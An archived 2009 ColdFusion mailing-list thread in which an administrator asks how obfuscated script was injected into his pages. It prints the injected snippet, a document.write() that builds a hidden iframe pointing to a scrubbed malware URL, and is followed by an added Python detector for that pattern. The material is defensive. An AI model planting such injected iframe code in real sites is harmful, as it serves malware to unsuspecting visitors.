Do a search on this list for 'exec('.
There was a big to-do about this last summer.  Probably in your database.



-----Original Message-----
From: Nick Gleason <n.glea...@citysoft.com>
Sent: Monday, April 06, 2009 2:19 PM
To: cf-talk <cf-talk@houseoffusion.com>
Subject: Question about hack


Hi there.  We've just seen a hack attempt that we haven't seen before and I
wanted to get feedback.

The symptom is that some script code is inserted at the bottom of certain
pages (e.g. index.cfm).  The script (which has been scrubbed) looks like
this:
<script><!--
       var applstrna0 = "<if";
       var applstrna1 = "rame src=http://said7";
       var applstrna2 = ".[BAD URL HERE]";
       var applstrna3 = " width=100 height=0></i";
       var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); 
//--></script> 

The script downloads malware, which we obviously want to prevent.  We're
trying to determine how it's getting in there, whether through an old site
with inadequate code or the OS or something else.  Any thoughts?

This is on a server running IIS 6 / CF7.

Thanks in advance,

Nick
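
A defender-side check for the symptom described in the message above, as an added example that is not part of the original thread: it resolves the string variables passed to `document.write()` and flags any call that assembles an `<iframe>` no single literal contains. The function name, the regular expressions and the sample page (with a placeholder host) are constructed for illustration.

```python
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
ASSIGN_RE = re.compile(r"""\bvar\s+(\w+)\s*=\s*(["'])(.*?)\2\s*;""", re.S)
WRITE_RE = re.compile(r"document\.write(?:ln)?\s*\(([^)]*)\)")
HIDDEN_RE = re.compile(r"""\b(?:width|height)\s*=\s*["']?0\b""", re.I)


def find_split_iframe_writes(page):
    """Return one finding per document.write() whose concatenated string
    variables assemble an <iframe> tag."""
    findings = []
    for script in SCRIPT_RE.finditer(page):
        body = script.group(1)
        literals = {m.group(1): m.group(3) for m in ASSIGN_RE.finditer(body)}
        for call in WRITE_RE.finditer(body):
            names = [n.strip() for n in call.group(1).split("+")]
            if any(n not in literals for n in names):
                continue  # not a pure concatenation of known string variables
            parts = [literals[n] for n in names]
            assembled = "".join(parts)
            if "<iframe" not in assembled.lower():
                continue
            findings.append({
                "offset": script.start(),  # where the script block starts
                "assembled": assembled,    # the markup the browser would receive
                # True when the tag name only appears after concatenation
                "split_across_literals": not any("<iframe" in p.lower() for p in parts),
                # True when the frame is sized to be invisible
                "hidden": bool(HIDDEN_RE.search(assembled)),
            })
    return findings


# Constructed sample: the scrubbed script from the post appended to a page,
# with a placeholder host, followed by a harmless document.write().
SAMPLE_PAGE = """<html><body><p>Welcome</p></body></html>
<script><!--
       var applstrna0 = "<if";
       var applstrna1 = "rame src=http://placeholder";
       var applstrna2 = ".example.invalid";
       var applstrna3 = " width=100 height=0></i";
       var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>
<script>var greeting = "hello"; document.write(greeting);</script>
"""

if __name__ == "__main__":
    for finding in find_split_iframe_writes(SAMPLE_PAGE):
        print(finding)
```

The same function can be run over template files on disk or over text columns exported from the database, since it only needs the page text.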





Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321362